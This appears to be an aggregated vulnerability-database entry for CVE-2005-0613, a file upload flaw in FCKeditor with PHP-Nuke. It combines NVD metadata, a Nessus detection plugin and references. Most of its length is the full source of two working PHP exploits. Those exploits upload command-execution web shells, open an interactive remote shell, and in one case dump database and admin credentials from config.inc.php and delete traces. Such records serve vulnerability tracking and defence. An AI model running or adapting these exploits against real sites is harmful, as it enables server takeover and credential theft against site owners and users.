ID CVE-2005-0613
Type cve
Reporter cve@mitre.org
Modified 2008-09-05T20:46:00
Description
Unknown vulnerability in FCKeditor 2.0 RC2, when used with PHP-Nuke, allows remote attackers to upload arbitrary files.
{"id": "CVE-2005-0613", "bulletinFamily": "NVD", "title": "CVE-2005-0613", "description": "Unknown vulnerability in FCKeditor 2.0 RC2, when used with PHP-Nuke, allows remote attackers to upload arbitrary files.", "published": "2005-02-28T05:00:00", "modified": "2008-09-05T20:46:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0613", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/12676"], "cvelist": ["CVE-2005-0613"], "type": "cve", "lastseen": "2020-10-03T11:34:53", "edition": 3, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["PHP_NUKE_FCKEDITOR_IMAGE_UPLOADS.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:14290"]}, {"type": "exploitdb", "idList": ["EDB-ID:6783", "EDB-ID:3702"]}], "modified": "2020-10-03T11:34:53", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-10-03T11:34:53", "rev": 2}, "vulnersScore": 5.6}, "cpe": ["cpe:/a:fckeditor:fckeditor:2.0_rc2"], "affectedSoftware": [{"cpeName": "fckeditor:fckeditor", "name": "fckeditor", "operator": "eq", "version": "2.0_rc2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:fckeditor:fckeditor:2.0_rc2:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:fckeditor:fckeditor:2.0_rc2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"nessus": [{"lastseen": "2021-01-01T04:54:56", "description": "The remote host is running a version of the FCKeditor add-on for\nPHP-Nuke that allows a remote attacker to upload arbitrary files and\nrun them in the context of the web server user.", "edition": 23, "published": "2005-03-01T00:00:00", "title": "FCKeditor for PHP-Nuke Arbitrary File Upload", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0613"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:phpnuke:php-nuke"], "id": "PHP_NUKE_FCKEDITOR_IMAGE_UPLOADS.NASL", "href": "https://www.tenable.com/plugins/nessus/17239", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17239);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2005-0613\");\n script_bugtraq_id(12676);\n\n script_name(english:\"FCKeditor for PHP-Nuke Arbitrary File Upload\");\n script_summary(english:\"Detects arbitrary file upload vulnerability in FCKeditor for PHP-Nuke\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from an\narbitrary code execution issue.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of the FCKeditor add-on for\nPHP-Nuke that allows a remote attacker to upload arbitrary files and\nrun them in the context of the web server user.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FCKeditor version 2.0 RC3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpnuke:php-nuke\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n script_dependencies(\"php_nuke_installed.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/php-nuke\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\ninstall = get_kb_item(\"www/\" + port + \"/php-nuke\");\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n if (safe_checks()) {\n r = http_send_recv3(method:\"GET\", item:dir + \"/modules.php?name=FCKeditor\", port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # according to _docs/whatsnew.html in the source, an Image button was\n # added in version 1.6.0 so it's probably safe to treat everything\n # from that through 2.0 RC2 as vulnerable.\n if (egrep(pattern:\"<br>FCKeditor (1\\.6|2\\.0 (BETA|RC1|RC2)) \", string:res)) {\n report = string(\n \"Nessus has determined the vulnerability exists on the target\\n\",\n \"simply by looking at the version number of FCKeditor\\n\",\n \"installed there.\\n\"\n );\n security_hole(port:port, extra:report);\n exit(0);\n }\n } \n else {\n # Try to exploit it.\n fname = \"nessus-plugin.gif.php\";\n bound = \"nessus\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"Newfile\"; filename=\"', fname, '\"', \"\\r\\n\",\n \"Content-Type: image/gif\\r\\n\",\n \"\\r\\n\",\n # NB: This is the actual exploit code; you could put pretty much\n # anything you want here.\n \"<?php phpinfo() ?>\\r\\n\",\n boundary, \"--\", \"\\r\\n\"\n );\n r = http_send_recv3(method:\"POST\", version: 11, port: port,\n item: dir + \"/modules/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=/\", \n add_headers: make_array(\"Content-Type\", \"multipart/form-data; boundary=\"+bound),\ndata: postdata);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # Now retrieve the \"image\" we just uploaded.\n #\n # nb: ServerPath defaults to \"/modules/FCKeditor/upload\" \n # in FCKeditor w/ PHP-Nuke.\n serverpath = \"/modules/FCKeditor/upload\";\n url = string(dir, serverpath, \"/Image/\", fname);\n r = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If we could run it, there's a problem.\n if (\"PHP Version\" >< res) {\n report = string(\n \"Nessus has successfully exploited this vulnerability by uploading\\n\",\n \"an image file with PHP code that reveals information about the\\n\",\n \"PHP configuration on the remote host. The file is located under\\n\",\n \"the web server's document directory as:\\n\",\n \" \", url, \"\\n\",\n \"You are strongly encouraged to delete this file as soon as\\n\",\n \"possible as it can be run by anyone who accesses it remotely.\\n\"\n );\n security_hole(port:port, extra:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:10", "bulletinFamily": "software", "cvelist": ["CVE-2006-0658", "CVE-2005-0613"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.fckeditor.net/\nSecurity Tracker: 1013320\n[Secunia Advisory ID:21117](https://secuniaresearch.flexerasoftware.com/advisories/21117/)\n[Secunia Advisory ID:18767](https://secuniaresearch.flexerasoftware.com/advisories/18767/)\nOther Advisory URL: http://retrogod.altervista.org/fckeditor_22_xpl.html\nOther Advisory URL: http://retrogod.altervista.org/toenda_100_shizouka_xpl.html\nOther Advisory URL: http://www.nsag.ru/vuln/893.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0294.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0434.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0153.html\nGeneric Exploit URL: http://milw0rm.com/exploits/3702\nFrSIRT Advisory: ADV-2006-0502\n[CVE-2005-0613](https://vulners.com/cve/CVE-2005-0613)\n[CVE-2006-0658](https://vulners.com/cve/CVE-2006-0658)\nBugtraq ID: 12676\n", "modified": "2005-02-28T00:00:00", "published": "2005-02-28T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:14290", "id": "OSVDB:14290", "type": "osvdb", "title": "FCKeditor connector.php File Upload Arbitrary PHP Code Execution", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-01T00:38:47", "description": "Nuke ET. CVE-2005-0613,CVE-2008-6178. Webapps exploit for php platform", "published": "2008-10-18T00:00:00", "type": "exploitdb", "title": "Nuke ET <= 3.4 - fckeditor Remote Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6178", "CVE-2005-0613"], "modified": "2008-10-18T00:00:00", "id": "EDB-ID:6783", "href": "https://www.exploit-db.com/exploits/6783/", "sourceData": "<?php\r\n\r\n/*\r\n\t---------------------------------------------------------------\r\n\tNuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit\r\n\t---------------------------------------------------------------\r\n\t\r\n\tauthor...: EgiX\r\n\tmail.....: n0b0d13s[at]gmail[dot]com\r\n\t\r\n\tlink.....: http://www.truzone.org/\r\n\t\r\n\tThis PoC was written for educational purpose. Use it at your own risk.\r\n\tAuthor will be not responsible for any damage.\r\n\t\r\n\t[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php\r\n\t\r\n\t147.\tfunction FileUpload( $resourceType, $currentFolder )\r\n\t148.\t{\r\n\t149.\t\t$sErrorNumber = '0' ;\r\n\t150.\t\t$sFileName = '' ;\r\n\t151.\t\r\n\t152.\t\tif ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )\r\n\t153.\t\t{\r\n\t154.\t\t\t$oFile = $_FILES['NewFile'] ;\r\n\t155.\t\r\n\t156.\t\t\t// Map the virtual path to the local server path.\r\n\t157.\t\t\t$sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;\r\n\t158.\t\r\n\t159.\t\t\t// Get the uploaded file name.\r\n\t160.\t\t\t$sFileName = $oFile['name'] ;\r\n\t161.\t\t\t$sOriginalFileName = $sFileName ;\r\n\t162.\t\t\t// Security fix by truzone 01-15-2006\r\n\t163.\t\t\t//$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;\r\n\t164.\t\t\t//$sExtension = strtolower( $sExtension ) ;\r\n\t165.\t\r\n\t166.\t\t\tif(extension_loaded(\"mime_magic\")){\r\n\t167.\t\t\t$sExtension = mime_content_type($oFile['tmp_name']);\r\n\t168.\t\t\t}else{\r\n\t169.\t\t\t$sExtension = $oFile['type'];\r\n\t170.\t\t\t}\r\n\t171.\t\t\t// en of security fix by truzone 01-15-2006\r\n\t172.\t\t\tglobal $Config ;\r\n\t173.\t\r\n\t174.\t\t\t$arAllowed\t= $Config['AllowedExtensions'][$resourceType] ;\r\n\t175.\t\t\t$arDenied\t= $Config['DeniedExtensions'][$resourceType] ;\r\n\r\n\tAn attacker might be able to upload arbitrary files containing malicious PHP code due to the code\r\n\tnear lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\ndefine(STDIN, fopen(\"php://stdin\", \"r\"));\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n\t$sock = fsockopen($host, 80);\r\n\twhile (!$sock)\r\n\t{\r\n\t\tprint \"\\n[-] No response from {$host}:80 Trying again...\";\r\n\t\t$sock = fsockopen($host, 80);\r\n\t}\r\n\tfputs($sock, $packet);\r\n\twhile (!feof($sock)) $resp .= fread($sock, 1024);\r\n\tfclose($sock);\r\n\treturn $resp;\r\n}\r\n\r\nfunction connector_response($html)\r\n{\r\n\treturn (preg_match(\"/OnUploadCompleted\\((\\d),\\\"(.*)\\\"\\)/\", $html, $match) && in_array($match[1], array(0, 201)));\r\n}\r\n\r\nprint \"\\n+------------------------------------------------------------------+\";\r\nprint \"\\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |\";\r\nprint \"\\n+------------------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n\tprint \"\\nUsage......: php $argv[0] host path\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /nukeet/\\n\";\r\n\tdie();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = ereg_replace(\"(/){2,}\", \"/\", $argv[2]);\r\n\r\n$filename = md5(time()).\".php\";\r\n$connector = \"FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php\";\r\n\r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"NewFile\\\"; filename=\\\"{$filename}\\\"\\r\\n\";\r\n$payload .= \"Content-Type: application/zip\\r\\n\\r\\n\";\r\n$payload .= \"PK\\003\\004<?php error_reporting(0);print(\\\"_code_\\\\n\\\");passthru(base64_decode(\\$_SERVER[HTTP_CMD])); ?>\\n\";\r\n$payload .= \"--o0oOo0o--\\r\\n\";\r\n\r\n$packet\t = \"POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\\r\\n\";\r\n$packet\t.= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n$packet .= $payload;\r\n\r\nif (!connector_response(http_send($host, $packet))) die(\"\\n[-] Upload failed!\\n\");\r\nelse print \"\\n[-] Shell uploaded to {$filename}...starting it!\\n\";\r\n\r\n$path .= str_repeat(\"../\", substr_count($path, \"/\") - 1) . \"UserFiles/File/\"; // come back to the document root \r\n\r\n$packet = \"GET {$path}{$filename} HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1)\r\n{\r\n\tprint \"\\nnukeet-shell# \";\r\n\t$cmd = trim(fgets(STDIN));\r\n\tif ($cmd != \"exit\")\r\n\t{\r\n\t\t$response = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n\t\tpreg_match(\"/_code_/\", $response) ? print array_pop(explode(\"_code_\", $response)) : die(\"\\n[-] Exploit failed...\\n\");\r\n\t}\r\n\telse break;\r\n}\r\n\r\n?>\r\n\r\n# milw0rm.com [2008-10-18]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6783/"}, {"lastseen": "2016-01-31T19:06:31", "description": "InoutMailingListManager <= 3.1 Remote Command Execution Exploit. CVE-2005-0613,CVE-2006-0658,CVE-2007-2002,CVE-2007-2003,CVE-2007-2004. Webapps exploit fo...", "published": "2007-04-10T00:00:00", "type": "exploitdb", "title": "InoutMailingListManager <= 3.1 - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0658", "CVE-2007-2004", "CVE-2005-0613", "CVE-2007-2003", "CVE-2007-2002"], "modified": "2007-04-10T00:00:00", "id": "EDB-ID:3702", "href": "https://www.exploit-db.com/exploits/3702/", "sourceData": "#!/usr/bin/php -q -d short_open_tag=on\n<?\necho \"\nInoutMailingListManager <= 3.1 Command Execution Exploit + Login Retrieve + Advisory\nby BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>\nThanks to rgod for the php code and Marty for the Love\n\";\nif ($argc<4) {\necho \"Usage: php \".$argv[0].\" Site CMD\nHost: target server (ip/hostname)\nPath: path of phpMyNewsletter\nCMD: a shell command\nExample:\nphp \".$argv[0].\" localhost /inout/ cat /etc/password\";\n\ndie;\n}\n\n/*\nMultiple Vuln can be found in this NewsLetter Script.\n\nI) FCKEditor Vuln\n\nThis script uses an old version of FCKEditor, so you can upload arbitrary file with:\n\n[dir]\\FCKeditor\\editor\\filemanager\\browser\\default\\connectors\\php\\connector.php\n\n(See rgod exploits for more info on it)\n\n\nII) Login-Bypass\n\nThis is the code to check admin rights:\n\nif(!isset($_COOKIE['admin']))\n{\nheader(\"Location:index.php\");\n}\n\n1st: everyone can create a cookie named 'admin'\n2nd: you neither have to do it, because the script doesn't die after the check..\n\nThis exploit Uses this vuln to create the shell.\nWith Admin rights try to upload a PHP attachment, run it to retrieve config.inc.php and\ncreate a piggy_marty.php file. After that the script delete the uploaded attachment to leave\nno trace.\n\nIII) SQL Injections\n\nThere are SQL Injections EVERYWERE!\n\none 4 all, changename.php:\n\n$result=mysql_query(\"select value from \".$tableprefix.\"ea_extraparam where eid=$id\");\n\n\n\nBlackHawk <hawkgotyou@gmail.com>\n*/\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$port=80;\n$proxy=\"\";\n$cmd=\"\";\nfor ($i=3; $i<=$argc-1; $i++){\n$cmd.=\" \".$argv[$i];\n}\n$cmd=urlencode($cmd);\n\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\necho \"Step 0 - Check if piggy_marty.php already exist..\\r\\n\";\n$packet =\"GET \".$p.\"attachments/696969/piggy_marty.php?cmd=$cmd HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\nif (strstr($html,\"666999\"))\n{\n echo \"Exploit succeeded...\\r\\n\";\n $temp=explode(\"666999\",$html);\n die(\"\\r\\n\".$temp[1].\"\\r\\n\");\n}\n\necho \"Step1 - Create a dir for the exploit\\r\\n\";\n$packet=\"GET \".$p.\"attach.php?id=696969 HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\nsleep(3);\necho \"Step2 - Upload The exploit Creator & Config Disclosure\\r\\n\";\n$data=\"-----------------------------7d529a1d23092a\\r\\n\";\n$data.=\"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"piggy_marty_creator.php\\\"\\r\\n\";\n$data.=\"Content-Type:\\r\\n\\r\\n\";\n$data.=\"<?php\n\\$fp=fopen('piggy_marty.php','w');\nfputs(\\$fp,'<?php error_reporting(0);\nset_time_limit(0);\nif (get_magic_quotes_gpc()) {\n\\$_GET[cmd]=stripslashes(\\$_GET[cmd]);\n}\necho 666999;\npassthru(\\$_GET[cmd]);\necho 666999;\n?>');\nfclose(\\$fp);\nchmod('piggy_marty.php',777);\ninclude '../../config.inc.php';\necho 'delimitator'.\\$mysql_server.'|'.\\$mysql_username.'|'.\\$mysql_password.'|'.\\$mysql_dbname.'|'.\\$username.'|'.\\$password;\n?>\\r\\n\";\n$data.=\"-----------------------------7d529a1d23092a--\\r\\n\";\n$packet=\"POST \".$p.\"attachfiles.php?id=696969 HTTP/1.0\\r\\n\";\n$packet.=\"CLIENT-IP: 999.999.999.999\\r\\n\";//spoof\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\\r\\n\";\n$packet.=\"Referer: http://\".$host.$path.\"/example.html\\r\\n\";\n$packet.=\"Accept-Language: it\\r\\n\";\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\\r\\n\";\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n$packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\";\n$packet.=\"Cache-Control: no-cache\\r\\n\";\n$packet.=\"Cookie: admin=BlackHawk\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\nsleep(3);\necho \"Step3 - Create The Shell and Retrieve Login Information\\r\\n\";\n$packet=\"GET \".$p.\"attachments/696969/piggy_marty_creator.php HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\n$temp=explode('delimitator',$html);\nlist($myserver,$myusername,$mypassword,$mydbname,$lgnusername,$lgnpassword)=explode('|',$temp[1]);\necho \"\n\n--- INFO FROM CONFIG.INC.PHP ---\n\nMySQL Server: $myserver\nMySQL Username: $myusername\nMySQL Password: $mypassword\nMySQL Database: $mydbname\n\nLogin: $lgnusername\nPassword: $lgnpassword\n\n--- END INFO ---\n\n\";\necho \"Step4 - Remove Shell Creator\\r\\n\";\n$packet=\"GET \".$p.\"attach.php?id=696969 HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\n$temp=explode('piggy_marty_creator.php <a href=\"removeattach.php?id=',$html);\n$id=explode('&cid=696969',$temp[1]);\n$packet=\"GET \".$p.\"removeattach.php?cid=696969&id=\".$id[0].\" HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\n\necho \"Step 5 - Check if piggy_marty.php already exist..\\r\\n\";\n$packet =\"GET \".$p.\"attachments/696969/piggy_marty.php?cmd=$cmd HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\nif (strstr($html,\"666999\"))\n{\n echo \"Exploit succeeded...\\r\\n\";\n $temp=explode(\"666999\",$html);\n die(\"\\r\\n\".$temp[1].\"\\r\\n\");\n}\n?>\n\n# milw0rm.com [2007-04-10]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3702/"}]}
